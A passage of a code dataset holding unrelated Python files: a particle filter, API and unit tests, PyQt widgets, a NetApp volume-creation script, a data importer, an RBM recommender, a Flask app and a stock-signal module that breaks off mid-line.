in range(Nf):\n        Xa[:,i,0] = xb + sqB.dot(prng.normal(size=dx))\n    for t in range(T):\n        # Resampling\n        ind = SIR_resampling(Wa[:,t])\n        # Forecasting\n        Xf_for[:,:,t] = f(Xa[:,:,t])\n        Xf[:,:,t] = Xf_for[:,ind,t]+ sqQ.dot(prng.normal(size=(dx, Nf)))\n        Xa[:,:,t+1] = Xf[:,:,t]\n\n        # Weighting\n        Y = H.dot(Xa[:,:,t+1]) \n        innov = np.tile(obs[:,t], (Nf,1)).T - Y\n        logmax = np.max(-.5 *np.sum(innov.T.dot(inv(R))*(innov.T),1)) # for numerical stability\n        Wa[:,t+1] = np.exp(-.5 *np.sum(innov.T.dot(inv(R))*(innov.T),1) - logmax)#*Wa_prev\n        Wa[:,t+1] = Wa[:,t+1]/np.sum(Wa[:,t+1])\n        \n    return Xa, Xf, Xf_for, Wa, ind","sub_path":"Particle_lorenz_ext/algos/PF.py","file_name":"PF.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"632891373","text":"#Definition for singly-linked list:\nclass ListNode(object):\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\nclass Solution(object):\n    def reverseList(self, head):\n        rev = None #important\n        while head: #before reaching the last ->/before reaching the end of the list\n            head.next,rev,head = rev,head,head.next #Hanoi Tower converting an -> direction at a time\n        return rev #the head of the reversed linkedlist","sub_path":"linkedList.py","file_name":"linkedList.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"87646396","text":"import json\nimport os\nimport unittest\n\nfrom common.db_handler import DBhandler\nfrom common.excel_handler import ExcelHandler\nfrom common.helper import get_mobile\nfrom common.logger_handler import LoggerHandler\nfrom common.requests_handler import RequestHandler\nfrom middleware.helper import save_token, Context\nfrom middleware.yaml_handler import YamlHandler,yaml_data\nfrom config.setting import config\nfrom lib import ddt\nfrom decimal import Decimal\n\n\n\n@ddt.ddt\nclass TestRecharge(unittest.TestCase):\n    # def setUp(self) -> None:\n    # Read the test data from the Excel file\n    excel_handler=ExcelHandler(config.data_path)\n    data=excel_handler.total_test(\"recharge\")\n    # Read the data from the yaml file\n    # yaml_data =YamlHandler(config.yaml_config_path).yaml_read()\n    logger=LoggerHandler(name=yaml_data[\"logger\"][\"name\"],\n                         level=yaml_data[\"logger\"][\"level\"],\n                         file=yaml_data[\"logger\"][\"file\"],)\n\n    def setUp(self) -> None:\n        # Instantiate the request handler\n        self.req=RequestHandler()\n        # Each test uses its own db object, so it is created in the setup fixture\n        self.db=DBhandler(host=yaml_data[\"database\"][\"host\"],\n                          port=yaml_data[\"database\"][\"port\"],\n                          password=yaml_data[\"database\"][\"password\"],\n                          user=yaml_data[\"database\"][\"user\"],\n                          charset=yaml_data[\"database\"][\"charset\"],\n                          database=yaml_data[\"database\"][\"database\"])\n        # Log in\n        # save_token()\n        # self.token=Context.token\n        # self.member_id=Context.member_id\n\n\n    def tearDown(self) -> None:\n        # Close the session\n        self.req.close_session()\n        self.db.close()\n    @ddt.data(*data)\n    def test_recharge(self,test_data):\n        \"\"\"Recharge interface\n        1. Replace member_id in the json data\n        2. Call the interface and get the actual result\n        3. Assert the actual result, and verify the recharge amount in the database\"\"\"\n        # When recharging, member_id changes dynamically; amount is fixed and can be hard-coded; the headers need the token returned at login:\n        # Two ways to handle the token: first, put a ## placeholder in the Excel headers and fill it with replace; second, fetch the token during login in the setup fixture and attach it to the request headers\n        # Before recharging, query the database for the balance before the recharge\n        member_id=Context().member_id\n        token=Context().token\n\n        sql=\"select * from member where id=%s;\"\n        user=self.db.query(sql,args=[member_id])\n        before_money=user[\"leave_amount\"]\n\n        if \"#member_id#\" in test_data[\"json\"]:\n            test_data[\"json\"]=test_data[\"json\"].replace(\"#member_id#\",str(member_id))\n        # Wrong-user case: any id other than the logged-in one will do, e.g. id+1 or id+2\n        if \"#other_id#\" in test_data[\"json\"]:\n            test_data[\"json\"]=test_data[\"json\"].replace(\"#other_id#\",str(member_id+1))\n        # Read the headers from Excel; this returns a dict\n        headers=json.loads(test_data[\"headers\"])\n        # Set the Authorization header\n        headers[\"Authorization\"]=token\n        res=self.req.visit(test_data[\"method\"],\n                           config.host+test_data[\"url\"],\n                           json=json.loads(test_data[\"json\"]),\n                           headers=headers)\n        print(res)\n\n\n        # Get the expected value, then assert\n        try:\n            self.assertEqual(test_data[\"expected\"],res[\"code\"])\n            # Second assertion: successful recharge cases need a database check on the amount\n            # Judge success by the return code; if there is no code, use msg or add a tag column in Excel\n            if res[\"code\"]==0:\n                # Check the database result: balance before + recharge amount = balance after\n                money=json.loads(test_data[\"json\"])[\"amount\"]\n                # Getting the balance before recharging via the leave_amount returned by save_token fails for repeated recharges, so save_token() should run in the setup fixture so it is fetched before every case\n\n                sql = \"select * from member where id=%s;\"\n                after_user = self.db.query(sql, args=[member_id])\n                after_money = after_user[\"leave_amount\"]\n                self.assertEqual( before_money + Decimal(money) , after_money)\n\n            # Write the actual result to Excel\n            self.excel_handler.write_cell(\"recharge\",config.data_path,test_data[\"case_id\"]+1,9,\"case passed\")\n        except AssertionError as e:\n            # Log the failure\n            self.logger.error(\"Test case failed: {}\".format(e))\n            # Re-raise manually, otherwise the test would pass silently; write the result to Excel\n            self.excel_handler.write_cell(\"recharge\",config.data_path,test_data[\"case_id\"]+1,9,\"case failed\")\n            raise e\n\n\n\n","sub_path":"test_cases/test_03_recharge.py","file_name":"test_03_recharge.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"406349463","text":"# -*- coding: utf-8 -*-\nimport logging\n\n\ndef get_repo_names():\n    return [\"rzhilkibaev/demo-simple-web\"]\n\ndef handle(event, context):\n    log = logging.getLogger()\n    log.setLevel(logging.DEBUG)\n    log.debug(\"received event \" + str(event))\n    \n    repo_name = event[\"repository\"][\"full_name\"]\n    if repo_name in get_repo_names():\n        log.info(\"repository \" + repo_name + \" changed\")\n    \n    return None\n","sub_path":"shmenkins/handle_webhook.py","file_name":"handle_webhook.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"264736312","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n################################################################################\n# Phoseg Copyright (C) 2012 Suizokukan\n# Contact: suizokukan _A.T._ orange dot fr\n#\n# This file is part of Phoseg.\n# Phoseg is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Phoseg is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Phoseg. 
If not, see <http://www.gnu.org/licenses/>.\n################################################################################\n\"\"\"\n        ❏Phoseg❏ : phoseg/tests/lops_test.py\n\"\"\"\n\n# pylint: disable=R0904\n# (\"Too many public methods\")\n# Since these classes are derived from unittest.TestCase we have a lot of\n# methods in the following classe(s).\nfrom phoseg.phonetic.lops import LOPhoneticSegments\nfrom phoseg.errors.errors import PhoSegError\nfrom phoseg import PhoSegObject\nimport unittest\n\n################################################################################\nclass TestLOPhoneticSegments(unittest.TestCase):\n    \"\"\"\n        class TestLOPhoneticSegments\n\n        test of phoseg.phonetic.lops::LOPhoneticSegments\n    \"\"\"\n\n    #///////////////////////////////////////////////////////////////////////////\n    def test_context(self):\n        \"\"\"\n        class TestLops.test_context\n        \"\"\"\n\n        # missing asterisk :\n        phoneticsegments_list = []\n        lops = LOPhoneticSegments(phoneticsegments_list)\n        with self.assertRaises(PhoSegError):\n            lops.context(10,\"VC\")\n\n        # several asterisks :\n        phoneticsegments_list = []\n        lops = LOPhoneticSegments(phoneticsegments_list)\n        with self.assertRaises(PhoSegError):\n            lops.context(10,\"C*VC*\")\n\n        # asterisk in position #0 :\n        phoneticsegments_list = []\n        lops = LOPhoneticSegments(phoneticsegments_list)\n        with self.assertRaises(PhoSegError):\n            lops.context(10,\"*VC\")\n\n        # empty string but everything's ok :\n        phoneticsegments_list = []\n        lops = LOPhoneticSegments(phoneticsegments_list)\n        self.assertEqual( lops.context(10,\"V*C\"),\n                          False )\n\n        # nothing's special, everything's ok :\n        phoneticsegments_list = [ps[0] for ps in PhoSegObject(ipa = \"tapa\").get_phonemes()]\n        lops = LOPhoneticSegments(phoneticsegments_list)\n        self.assertEqual( lops.context(1,\"CV*C\"),\n                          True )\n\n        # nothing's special, everything's ok :\n        phoneticsegments_list = [ps[0] for ps in PhoSegObject(ipa = \"tapa\").get_phonemes()]\n        lops = LOPhoneticSegments(phoneticsegments_list)\n        self.assertEqual( lops.context(0,\"C*VC\"),\n                          True )\n\n        # nothing's special, everything's ok :\n        phoneticsegments_list = [ps[0] for ps in PhoSegObject(ipa = \"tapa\").get_phonemes()]\n        lops = LOPhoneticSegments(phoneticsegments_list)\n        self.assertEqual( lops.context(3,\"CVCV*\"),\n                          True )\n","sub_path":"tests/lops_test.py","file_name":"lops_test.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"305224751","text":"from PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QWidget, QCheckBox\n\n\nclass Axis:\n    \"\"\"\n    Axis determines which values will be retrieved from the data file\n\n    The possibilities are:\n    - 2 different LEDs, represents the distance between them\n    - 1 LED and 1 coordinate, represents the value of this coordinate of the LED\n    - Temperature or time, self explanatory\n\n    No invalid combination of boxes can be checked\n    \"\"\"\n\n    def create_boxes(self):\n        \"\"\"Organize the check boxes\"\"\"\n\n        self._ctrl_leds = [False for i in range(5)]\n\n        self.setFocusPolicy(Qt.ClickFocus)\n\n        self._cb_l1 = QCheckBox('Led1', self)\n        self._cb_l1.stateChanged.connect(self.change_led_state(1))\n        self._cb_l1.setLayoutDirection(Qt.RightToLeft)\n        self._box_lay.addWidget(self._cb_l1)\n\n        self._cb_l2 = QCheckBox('Led2', self)\n        self._cb_l2.stateChanged.connect(self.change_led_state(2))\n        self._cb_l2.setLayoutDirection(Qt.RightToLeft)\n        self._box_lay.addWidget(self._cb_l2)\n\n        self._cb_l3 = QCheckBox('Led3', self)\n        
self._cb_l3.stateChanged.connect(self.change_led_state(3))\n self._cb_l3.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_l3)\n\n self._cb_l4 = QCheckBox('Led4', self)\n self._cb_l4.stateChanged.connect(self.change_led_state(4))\n self._cb_l4.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_l4)\n\n self._cb_x = QCheckBox('Linhas', self)\n self._cb_x.stateChanged.connect(self.change_coord_state(0))\n self._cb_x.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_x)\n\n self._cb_y = QCheckBox('Colunas', self)\n self._cb_y.stateChanged.connect(self.change_coord_state(1))\n self._cb_y.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_y)\n\n self._cb_temp = QCheckBox('Temp.', self)\n self._cb_temp.stateChanged.connect(self.change_others_state(1))\n self._cb_temp.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_temp)\n\n self._cb_time = QCheckBox('Tempo', self)\n self._cb_time.stateChanged.connect(self.change_others_state(0))\n self._cb_time.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_time)\n\n self._cb_pos = QCheckBox('Pos.', self)\n self._cb_pos.stateChanged.connect(self.change_others_state(2))\n self._cb_pos.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_pos)\n\n def change_led_state(self, ind):\n \"\"\"Logic behind when a LED box change state\n\n Input:\n ind (int): index of LED that changed state\n \"\"\"\n\n def change_led():\n self._ctrl_leds[ind] = not self._ctrl_leds[ind]\n\n if self._ctrl_leds[ind] == True:\n if self.count_set_leds() == 1:\n self.disable_others()\n\n if self._cb_x.isChecked() or self._cb_y.isChecked():\n self.disable_leds()\n else:\n self.disable_leds()\n self.disable_coords()\n else:\n self.enable_leds()\n if self.count_set_leds() == 1:\n self.enable_coords()\n\n elif not self._cb_x.isChecked() and not self._cb_y.isChecked():\n self.enable_others()\n\n return change_led\n\n def change_coord_state(self, ind):\n \"\"\"Logic behind when a coordinate box is checked\n\n Input:\n ind (int): which coordinate box was checked, 0 for x and 1 for y\n \"\"\"\n\n def change_coord():\n ctrl_aux = (ind == 0) * self._cb_x.isChecked() or (\n ind == 1) * self._cb_y.isChecked()\n\n if ctrl_aux == True:\n self.disable_others()\n self.disable_coords()\n\n if self.count_set_leds() == 1:\n self.disable_leds()\n else:\n self.enable_coords()\n self.enable_leds()\n\n if self.count_set_leds() == 0:\n self.enable_others()\n\n return change_coord\n\n def change_others_state(self, ind):\n \"\"\"Logic behind when a time, temperature or distance box is checked\n\n Input:\n ind (int): which 'other' box was checked\n \"\"\"\n\n def change_others():\n ctrl_aux = ((ind == 0) * self._cb_time.isChecked() or (ind == 1) * self._cb_temp.isChecked() or\n (ind == 2) * self._cb_pos.isChecked())\n\n if ctrl_aux == True:\n self.disable_others()\n self.disable_coords()\n self.disable_leds()\n else:\n self.enable_others()\n self.enable_coords()\n self.enable_leds()\n\n return change_others\n\n def enable_coords(self):\n \"\"\"Enable coordinates boxes\"\"\"\n\n self._cb_x.setEnabled(True)\n self._cb_y.setEnabled(True)\n\n def disable_coords(self):\n \"\"\"Disable coordinates boxes\"\"\"\n\n self._cb_x.setDisabled(not self._cb_x.isChecked())\n self._cb_y.setDisabled(not self._cb_y.isChecked())\n\n def enable_others(self):\n \"\"\"Enable time, temperature and distance boxes\"\"\"\n\n self._cb_time.setEnabled(True)\n self._cb_temp.setEnabled(True)\n 
self._cb_pos.setEnabled(True)\n\n def disable_others(self):\n \"\"\"Disable time, temperature and distance boxes\"\"\"\n\n self._cb_time.setDisabled(not self._cb_time.isChecked())\n self._cb_temp.setDisabled(not self._cb_temp.isChecked())\n self._cb_pos.setDisabled(not self._cb_pos.isChecked())\n\n def enable_leds(self):\n \"\"\"Enable LEDs boxes\"\"\"\n\n self._cb_l1.setEnabled(True)\n self._cb_l2.setEnabled(True)\n self._cb_l3.setEnabled(True)\n self._cb_l4.setEnabled(True)\n\n def disable_leds(self):\n \"\"\"Disable LEDs boxes\"\"\"\n\n self._cb_l1.setDisabled(not self._cb_l1.isChecked())\n self._cb_l2.setDisabled(not self._cb_l2.isChecked())\n self._cb_l3.setDisabled(not self._cb_l3.isChecked())\n self._cb_l4.setDisabled(not self._cb_l4.isChecked())\n\n def count_set_leds(self):\n \"\"\"Count the number of active LEDs boxes\n\n Return:\n val (int): number of LEDs with active boxes\n \"\"\"\n\n return len([i for i in self._ctrl_leds if i == True])\n\n def is_valid(self):\n \"\"\"Test if current combination of check boxes means a valid information from the data\n\n Return:\n valid (bool): True if combination is valid, false otherwise\n \"\"\"\n\n if self.count_set_leds() == 1:\n return self._cb_x.isChecked() or self._cb_y.isChecked()\n elif self.count_set_leds() == 0:\n return self._cb_temp.isChecked() or self._cb_time.isChecked() or self._cb_pos.isChecked()\n\n return True\n\n def get_ind(self):\n \"\"\"Indices in the data sheet that the current boxes combination represent\n\n Return:\n ind ([int]): Indices in the data sheet\n \"\"\"\n\n ind = [2 * (i - 1) for i in range(5) if self._ctrl_leds[i] == True]\n\n if not ind:\n ind.append(8 * self._cb_temp.isChecked() + 9 *\n self._cb_time.isChecked() + 10 * self._cb_pos.isChecked())\n\n if self._cb_y.isChecked():\n ind[0] += 1\n\n return ind\n\n\nclass YAxis(QWidget, Axis):\n\n \"\"\"Vertical Axis\"\"\"\n\n def __init__(self, parent=None):\n QWidget.__init__(self)\n\n self._box_lay = QVBoxLayout()\n self.setLayout(self._box_lay)\n self.create_boxes()\n self._cb_pos.hide()\n\n # Initial State\n self._cb_l1.setChecked(True)\n self._cb_l2.setChecked(True)\n\n\nclass XAxis(QWidget, Axis):\n\n \"\"\"Horizontal Axis\"\"\"\n\n def __init__(self, parent=None):\n QWidget.__init__(self)\n\n self._box_lay = QHBoxLayout()\n self.setLayout(self._box_lay)\n self.create_boxes()\n\n # Initial State\n self._cb_pos.setChecked(True)\n\nif __name__ == '__main__':\n pass","sub_path":"cagi/axis.py","file_name":"axis.py","file_ext":"py","file_size_in_byte":8215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"647398698","text":"# Note: Enter the volume size in exact multiples of 1GiB (1024^3).\n# In the below example, the volume size specified for “quotaInBytes”is 1099511627776, which is 1024 GiB.\nimport google.auth\nimport google.auth.transport.requests\nimport requests\nimport json\nimport time\nfrom google.auth import jwt\nfrom google.oauth2 import service_account\n\n# Set common variables\naudience = 'https://cloudvolumesgcp-api.netapp.com'\nserver = 'https://cloudvolumesgcp-api.netapp.com'\n# Enter your service account file below\nservice_account_file = '/Users/arjunan/Downloads/ncv-beta-demo-eccee8711557.json'\nproject_number = 123456789 # Enter your project number here\nlocation = \"us-east1\"\nvolumeIDdetails = \"Enter your Volume ID here\"\n\n# Small utility function to convert bytes to gibibytes\ndef convertToGiB(bytes):\n return bytes/1024/1024/1024\n\ndef get_token():\n # Create credential object 
from private key file\n svc_creds = service_account.Credentials.from_service_account_file(\n service_account_file)\n\n # Create jwt\n jwt_creds = jwt.Credentials.from_signing_credentials(\n svc_creds, audience=audience)\n\n # Issue request to get auth token\n request = google.auth.transport.requests.Request()\n jwt_creds.refresh(request)\n\n # Extract token\n id_token1 = jwt_creds.token\n #print (id_token1)\n return id_token1\n\ndef createVol():\n id_token1 = get_token()\n # Get all volumes from all regions\n # Construct GET request\n\n createvolumeURL = server + \"/v2/projects/\" + str(project_number) + \"/locations/\" + location + \"/Volumes/\"\n payload = {\n \"name\": \"AutomatedVolume3\",\n \"creationToken\": \"ACV3\",\n \"region\": \"us-east1\",\n \"zone\": \"us-east1-b\",\n \"serviceLevel\": \"basic\",\n \"quotaInBytes\": 1099511627776,\n \"usedBytes\": 78606279278,\n \"snapshotPolicy\": {\n \"dailySchedule\": {\n \"hour\": 1,\n \"minute\": 10,\n \"snapshotsToKeep\": 5\n }\n },\n \"storageClass\": \"software\",\n \"network\": \"projects/123456789/global/networks/ncv-vpc\", # Replace with your VPC instead of ncv-vpc and the project number instead of 123456789\n \"protocolTypes\": [\n \"NFSv3\"\n ]\n }\n headers = {\n 'accept': \"application/json\",\n 'Content-Type': \"application/json\",\n 'Authorization': \"Bearer \" + id_token1.decode('utf-8'),\n 'cache-control': \"no-cache\",\n }\n # POST request to create the volume\n response = requests.post(createvolumeURL, json.dumps(payload), headers=headers)\n # Sleep for 20 seconds to wait for the creation of the volume\n time.sleep(20)\n print(response)\n r_dict = response.json()\n # print(\"Response to POST request: \" + response.text)\n # Get volume attributes\n # To get the values from the dictionary, you have read the dictionary one by one.\n # fetch the response first\n fetchvalue = (r_dict.get('response'))\n # fetch all the values from the response\n fetchvolumeID = fetchvalue.get('AnyValue')\n # fetch the volume ID from the values\n volumeID = fetchvolumeID.get('volumeId')\n # fetch the service level from the values\n serviceLevel = fetchvolumeID.get('serviceLevel')\n # Print the values\n print(\"\\tvolumeID: \" + volumeID + \", serviceLevel: \" + serviceLevel)\n\ncreateVol()\n","sub_path":"createVolume_NFSv3_SW.py","file_name":"createVolume_NFSv3_SW.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"585219144","text":"import logging\nfrom bc211.is_inactive import is_inactive\nfrom bc211.import_icarol_xml.location import update_locations\nfrom bc211.service import update_services_for_location\nfrom django.utils import translation\nfrom human_services.organizations.models import Organization\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef update_entire_organization(organization, city_latlong_map, counters):\n update_organization(organization, counters)\n locations = list(organization.locations)\n update_locations(locations, organization.id, city_latlong_map, counters)\n for location in locations:\n if not is_inactive(location.description):\n update_services_for_location(location.id, location.services, counters)\n\n\ndef update_organization(organization, counters):\n if is_inactive(organization.description):\n return\n translation.activate('en')\n existing = get_existing_organization_or_none(organization)\n if not existing:\n active_record = build_organization_active_record(organization)\n active_record.save()\n 
counters.count_organization_created()\n LOGGER.debug('created \"%s\" \"%s\"', organization.id, organization.name)\n else:\n LOGGER.warning('duplicate organization \"%s\" \"%s\"', organization.id, organization.name)\n\n\ndef get_existing_organization_or_none(organization):\n result = Organization.objects.filter(id=organization.id).all()\n return result[0] if result else None\n\n\ndef build_organization_active_record(record):\n active_record = get_or_create_organization_active_record(record.id)\n active_record.name = record.name\n active_record.description = record.description\n active_record.website = record.website\n active_record.email = record.email\n return active_record\n\n\ndef get_or_create_organization_active_record(pk):\n if Organization.objects.filter(id=pk).exists():\n return Organization.objects.get(id=pk)\n record = Organization()\n record.id = pk\n return record\n","sub_path":"bc211/import_icarol_xml/organization.py","file_name":"organization.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"340289304","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 12 18:33:31 2018\r\n\r\n@author: anjum\r\n\"\"\"\r\n\r\n# Building RBM\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport pandas as pd\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.parallel\r\nimport torch.optim as optim\r\nimport torch.utils.data\r\nfrom torch.autograd import Variable\r\n\r\n# Importing the data set\r\nmovies = pd.read_csv('ml-1m/movies.dat',\r\n sep = '::',\r\n header = None,\r\n engine = 'python',\r\n encoding ='latin-1') \r\n \r\nusers = pd.read_csv('ml-1m/users.dat',\r\n sep = '::',\r\n header = None,\r\n engine = 'python',\r\n encoding ='latin-1')\r\n \r\nratings = pd.read_csv('ml-1m/ratings.dat',\r\n sep = '::',\r\n header = None,\r\n engine = 'python',\r\n encoding ='latin-1') \r\n# Importing the training and test set\r\n\r\ntraining_set = pd.read_csv('ml-100k/u1.base',delimiter = '\\t')\r\ntraining_set = np.array(training_set, dtype = 'int')\r\ntest_set = pd.read_csv('ml-100k/u1.test',delimiter = '\\t')\r\ntest_set = np.array(test_set , dtype = 'int')\r\n\r\n# getting the number of users and the movies\r\n\r\nnb_users = max(max(training_set[:,0]),max(test_set[:,0]))\r\nnb_movies =max(max(training_set[:,1]),max(test_set[:,1])) \r\n\r\n# converting the data set in to array with users as lines and movies as columns\r\ndef convert(data):\r\n new_data = []\r\n for id_users in range(1, nb_users + 1):\r\n id_movies = data[:,1][data[:,0] == id_users]\r\n id_ratings = data[:,2][data[:,0] == id_users]\r\n ratings = np.zeros(nb_movies)\r\n ratings[id_movies - 1] = id_ratings\r\n new_data.append(list(ratings))\r\n return new_data\r\n\r\ntraining_set = convert(training_set)\r\ntest_set = convert(test_set)\r\n\r\n# converting the list of lists in to torch tensers\r\ntraining_set = torch.FloatTensor(training_set)\r\ntest_set = torch.FloatTensor(test_set)\r\n\r\n# Converting the data in to binary ratings 0 = not liked 1 = likes\r\n\r\ntraining_set[training_set == 0] = -1 # np reviews equals to -1\r\ntraining_set[training_set == 1] = 0\r\ntraining_set[training_set == 2] = 0\r\ntraining_set[training_set >= 3] = 1\r\n\r\ntest_set[test_set == 0] = -1 # np reviews equals to -1\r\ntest_set[test_set == 1] = 0\r\ntest_set[test_set == 2] = 0\r\ntest_set[test_set >= 3] = 1\r\n\r\n# Creating the architecture of RBM.\r\nclass RBM():\r\n def __init__(self, nv , nh): # Inetilizing num of hiden 
and visible nodes as inputs\r\n self.W = torch.randn(nh , nv) # probabilty of the visible nodes according to the hidden nodes\r\n self.a = torch.randn(1, nh) # Bias for hidden node in form of 2D tensor where 1 respons to batch and nh reponds to bias\r\n self.b = torch.randn(1, nv) # Bias for hidden node in form of 2D tensor where 1 respons to batch and nv reponds to bias\r\n def sample_h(self, x): \r\n # sampling the hidden nodes according to the condition probality\r\n # of a hidden node as per given visible node Where x EQUALS TO VISIBLE NODES\r\n wx = torch.mm(x, self.W.t()) # computing the weights times the neurons\r\n activation = wx + self.a.expand_as(wx) # expand is used to convert a in to dimensions of wx\r\n p_h_given_v = torch.sigmoid(activation) \r\n return p_h_given_v , torch.bernoulli(p_h_given_v)\r\n def sample_v(self, y):\r\n wy = torch.mm(y, self.W) # computing the weights times the neurons\r\n activation = wy + self.b.expand_as(wy) # expand is used to convert a in to dimensions of wx\r\n p_v_given_h = torch.sigmoid(activation) \r\n return p_v_given_h , torch.bernoulli(p_v_given_h)\r\n def train(self, v0,vk,ph0,phk):\r\n # train calculates contrastive divergence\r\n self.W += (torch.mm(v0.t(), ph0) - torch.mm(vk.t(), phk)).t()\r\n self.b += torch.sum((v0 - vk), 0) # zero is to get the 2d tensor\r\n self.a += torch.sum((ph0 - phk),0)\r\n\r\n# Inetializing parameters for RBM class\r\nnv = len(training_set[0]) # Number of movies \r\nnh = 100\r\nbatch_size = 100 # 1 for online learning\r\nrbm = RBM(nv,nh)\r\n\r\n# training the RBM\r\nwalks = 10 # number of walk steps required for gibbs sampling\r\nnb_epoch = 10\r\nfor epoch in range(1, nb_epoch +1):\r\n train_loss = 0\r\n s=0. # counter for the loss\r\n for id_users in range(0, nb_users - batch_size, batch_size):\r\n vk = training_set[id_users:id_users + batch_size] # Target (Taking users for the batch size)\r\n v0 = training_set[id_users:id_users + batch_size] # Actual users to get the loss\r\n ph0,_ = rbm.sample_h(v0)\r\n \r\n # Making loop for K step contrastive divergence\r\n for k in range(walks):\r\n _,hk = rbm.sample_h(vk) # getting the probabilities for first hidden nodes\r\n _,vk = rbm.sample_v(hk) # getting the update for the visible node\r\n vk[v0<0] = v0[v0<0] # Removng the cells with no ratings\r\n phk,_ = rbm.sample_h(vk)\r\n rbm.train(v0,vk,ph0,phk)\r\n train_loss += torch.mean(torch.abs(v0[v0>=0]-vk[v0>=0]))\r\n s+= 1.\r\n print('epoch: ' + str(epoch)+' loss: '+ str(train_loss/s))\r\n \r\n# Testing the RBM.\r\ntest_loss = 0\r\ns = 0.\r\nfor id_user in range(nb_users):\r\n v = training_set[id_user:id_user+1]\r\n vt = test_set[id_user:id_user+1]\r\n if len(vt[vt>=0]) > 0:\r\n _,h = rbm.sample_h(v)\r\n _,v = rbm.sample_v(h)\r\n test_loss += torch.mean(torch.abs(vt[vt>=0] - v[vt>=0]))\r\n s += 1.\r\nprint('test loss: '+str(test_loss/s)) \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n","sub_path":"RBM_1.py","file_name":"RBM_1.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"61059839","text":"#!/usr/bin/env python3\r\n\r\nimport mysql.connector\r\nfrom flask import Flask, render_template, redirect\r\n\r\nimport config\r\n\r\napp = Flask(\"PPCG v2\")\r\ndb_conn = None\r\n\r\n\r\n@app.route(\"/\")\r\ndef hello():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route(\"/post/\")\r\n@app.route(\"/post//\")\r\ndef get_post(post_id, post_title = None):\r\n cursor = db_conn.cursor(dictionary=True)\r\n cursor.execute(\"SELECT 
* FROM posts WHERE id = %s\", (post_id,))\r\n    post_data = cursor.fetchone()\r\n    cursor.close()\r\n    if post_data is None:\r\n        return render_template('notfound.html'), 404\r\n    return render_template('post.html', post_data=post_data)\r\n\r\n\r\nif __name__ == '__main__':\r\n    try:\r\n        db_conn = mysql.connector.connect(**config.db_config)\r\n        app.run(host='127.0.0.1', port=5000)\r\n    finally:\r\n        if db_conn is not None:\r\n            db_conn.close()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"78715318","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nAuthor: Aaron-Yang [code@jieyu.ai]\nContributors: \n\n\"\"\"\nimport logging\nfrom typing import Callable\n\nimport arrow\nimport cfg4py\nimport numpy as np\nfrom omicron.core.timeframe import tf\nfrom omicron.core.types import FrameType, Frame\nfrom omicron.models.securities import Securities\nfrom omicron.models.security import Security\nfrom pandas import DataFrame\n\nfrom alpha.core import signal\n\nlogger = logging.getLogger(__name__)\n\ncfg = cfg4py.get_instance()\n\n\nclass Two:\n    \"\"\"\n    Sample: 西部资源 600139, 2020-08-04 10:00:00\n\n    1. The price is above all moving averages\n    2. On the 30-minute chart ma5, ma10 and ma60 converge (over overlap_win bars) and then turn bullish\n    3. ma60 slopes upward\n    4. On the daily chart there must be a high-volume bullish candle within the last few days (n<7)\n    \"\"\"\n\n    async def fire_long(self, end: Frame = None, overlap_win=10,\n                        frame_type: FrameType = FrameType.MIN30):\n        \"\"\"\n        Look for long-entry signals\n        Args:\n\n        Returns:\n\n        \"\"\"\n        result = []\n        end = end or arrow.now().datetime\n        secs = Securities()\n        for code in secs.choose(['stock']):\n            #for code in ['600139.XSHG']:\n            try:\n                sec = Security(code)\n                start = tf.shift(end, -(60 + overlap_win - 1), frame_type)\n                bars = await sec.load_bars(start, end, frame_type)\n\n                mas = {}\n                for win in [5, 10, 20, 60]:\n                    ma = signal.moving_average(bars['close'], win)\n                    mas[f\"{win}\"] = ma\n\n                # The close is above every moving average\n                c1, c0 = bars['close'][-2:]\n                t1 = c0 > mas[\"5\"][-1] and c0 > 